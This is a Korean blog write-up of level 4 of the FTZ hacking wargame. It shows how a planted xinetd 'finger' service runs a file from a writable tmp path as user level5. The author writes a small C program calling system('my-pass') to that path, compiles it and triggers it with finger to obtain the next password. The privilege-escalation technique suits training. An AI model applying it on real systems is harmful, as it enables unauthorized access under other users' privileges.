Jaeseo's Information Security Story

FTZ - level4 - WriteUp 본문

Write UP/FTZ

FTZ - level4 - WriteUp

Jaeseokim 2019. 11. 8. 23:23

이전 level3 WriteUp를 보고 싶은 분은 아래로

 

FTZ - level3 - WriteUp

일단 hint를 보고 문제를 풀어본다. 일단 autodig명령어를 이용하여 level4의 권한을 얻어야 하는 것 같다. whereis와 ls -la를 통해 살펴 본 결과 leve4의 권한으로 set-uid가 설정되어 있다. 이제 autodig 명..

jaeseokim.tistory.com

일단 hint 파일을 읽어 본다.

hint를 보니 /etc/xinetd.d/ 백도어를 숨겨두었다고 하니 이쪽을 공략 하여 다음 level5의 권한을 얻어야 하는 것으로 보인다.

일단 xinetd(슈퍼 데몬)의 설정 폴더로 이동하여 확인 한다.

중간에 backdoor 라는 파일이 level4의 소유그룹에 속한 것을 볼수가 있다.

backdoor 파일을 살펴 본다.

service finger 
{
    disable    = no 
    flags        = REUSE
    socket_type    = stream        
    wait        = no
    user        = level5 //level5의 권한으로 데몬을 시작한다.
    server        = /home/level4/tmp/backdoor //데몬 파일
    log_on_failure    += USERID
}

finger가 작동할때 server에 지정되어 있는 파일을 가져와 실행 할 것으로 예상이 된다.

이때 /home/level4/tmp/backdoor로 level5의 권한으로 실행을 원하는 프로그램을 작성해준다.

#include "stdio.h"

int main() {
  system("my-pass");
  return 0;
}

이제 그다음 gcc -o backdoor backdoor.c를 하여 프로그램을 컴파일 해준다.

이제 finger 명령어가 xinetd데몬에 의해 작동을 할수 있도록 실행을 한다.
finger level4@127.0.0.1


level5:what is your name?

'Write UP > FTZ' 카테고리의 다른 글

FTZ - level6 - WriteUp  (0) 2019.11.09
FTZ - level5 - WriteUP  (0) 2019.11.09
FTZ - level3 - WriteUp  (0) 2019.11.08
FTZ - level2 - WriteUp  (0) 2019.11.08
FTZ - level 1 - WriteUP  (0) 2019.11.08
Comments